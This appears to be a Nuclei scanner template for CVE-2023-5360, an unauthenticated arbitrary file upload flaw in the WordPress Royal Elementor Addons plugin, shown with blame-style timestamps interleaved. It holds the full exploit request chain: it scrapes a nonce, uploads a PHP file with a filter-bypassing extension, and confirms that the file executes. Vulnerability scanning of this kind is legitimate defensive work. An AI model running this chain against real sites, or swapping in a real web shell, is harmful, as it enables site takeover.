2023-10-17 09:00:45 +00:00
id : CVE-2023-5360
info :
name : WordPress Royal Elementor Addons Plugin <= 1.3.78 - Arbitrary File Upload
author : theamanrawat
severity : critical
description : |
Arbitrary File Upload vulnerability in WordPress Royal Elementor Addons Plugin. This could allow a malicious actor to upload any type of file to your website. This can include backdoors which are then executed to gain further access to your website. This vulnerability has been fixed in version 1.3.79
2023-10-18 16:27:26 +00:00
remediation : Fixed in 1.3.79
2023-10-17 09:00:45 +00:00
reference :
- https://wordpress.org/plugins/royal-elementor-addons/
- https://wpscan.com/vulnerability/281518ff-7816-4007-b712-63aed7828b34/
- https://nvd.nist.gov/vuln/detail/CVE-2023-5360
2023-10-31 18:27:55 +00:00
- https://wpscan.com/vulnerability/281518ff-7816-4007-b712-63aed7828b34
2023-12-12 11:07:52 +00:00
- http://packetstormsecurity.com/files/175992/WordPress-Royal-Elementor-Addons-And-Templates-Remote-Shell-Upload.html
2023-11-01 14:45:21 +00:00
classification :
2023-11-09 06:04:52 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score : 9.8
cve-id : CVE-2023-5360
cwe-id : CWE-434
2024-01-14 13:49:27 +00:00
epss-score : 0.96723
2024-03-23 09:28:19 +00:00
epss-percentile : 0.99637
2023-11-09 06:04:52 +00:00
cpe : cpe:2.3:a:royal-elementor-addons:royal_elementor_addons:*:*:*:*:*:wordpress:*:*
2023-10-17 09:00:45 +00:00
metadata :
verified : "true"
2023-10-17 11:58:54 +00:00
max-request : 3
2023-11-09 06:04:52 +00:00
vendor : royal-elementor-addons
product : royal_elementor_addons
framework : wordpress
2023-10-17 11:58:54 +00:00
publicwww-query : "/plugins/royal-elementor-addons/"
2024-01-14 13:49:27 +00:00
tags : wpscan,packetstorm,cve,cve2023,rce,wordpress,wp-plugin,wp,royal-elementor-addons,unauth,intrusive
2024-04-15 11:26:37 +00:00
2023-10-17 11:58:54 +00:00
variables :
file : "{{to_lower(rand_text_alpha(5))}}"
2024-04-15 11:26:37 +00:00
string : "CVE-2023-5360"
2023-10-17 09:00:45 +00:00
http :
- raw :
- |
GET / HTTP/1.1
Host : {{Hostname}}
- |
POST /wp-admin/admin-ajax.php?action=wpr_addons_upload_file HTTP/1.1
Host : {{Hostname}}
Content-Type : multipart/form-data; boundary=---------------------------318949277012917151102295043236
-----------------------------318949277012917151102295043236
2023-10-17 11:58:54 +00:00
Content-Disposition : form-data; name="uploaded_file"; filename="{{file}}.ph$p"
2023-10-17 09:00:45 +00:00
Content-Type : image/png
2024-04-15 11:26:37 +00:00
<?php echo md5("{{string}}");unlink(__FILE__);?>
2023-10-17 09:00:45 +00:00
-----------------------------318949277012917151102295043236
Content-Disposition : form-data; name="allowed_file_types"
ph$p
-----------------------------318949277012917151102295043236
Content-Disposition : form-data; name="triggering_event"
click
-----------------------------318949277012917151102295043236
Content-Disposition : form-data; name="wpr_addons_nonce"
{{nonce}}
-----------------------------318949277012917151102295043236 --
- |
GET /wp-content/uploads/wpr-addons/forms/{{filename}}.php HTTP/1.1
Host : {{Hostname}}
matchers-condition : and
matchers :
- type : word
part : body_3
words :
2024-04-15 11:26:37 +00:00
- '{{md5(string)}}'
2023-10-17 09:00:45 +00:00
extractors :
- type : regex
name : nonce
part : body_1
group : 1
regex :
- 'WprConfig\s*=\s*{[^}]*"nonce"\s*:\s*"([^"]*)"'
internal : true
- type : regex
name : filename
part : body_2
group : 1
regex :
- 'wp-content\\\/uploads\\\/wpr-addons\\\/forms\\\/(.*?).php'
internal : true
2024-04-23 10:06:08 +00:00
# digest: 4a0a0047304502204665cabc6c8c44c3492f9c39c134e9b8c31ea03dbf553b0a56e0fcf05e55bb250221008335b09068b0bd294ca32ba10a94b16b44feb5888b2edf5f8d95651af7ef79ba:922c64590222798bb761d5b6d8e72950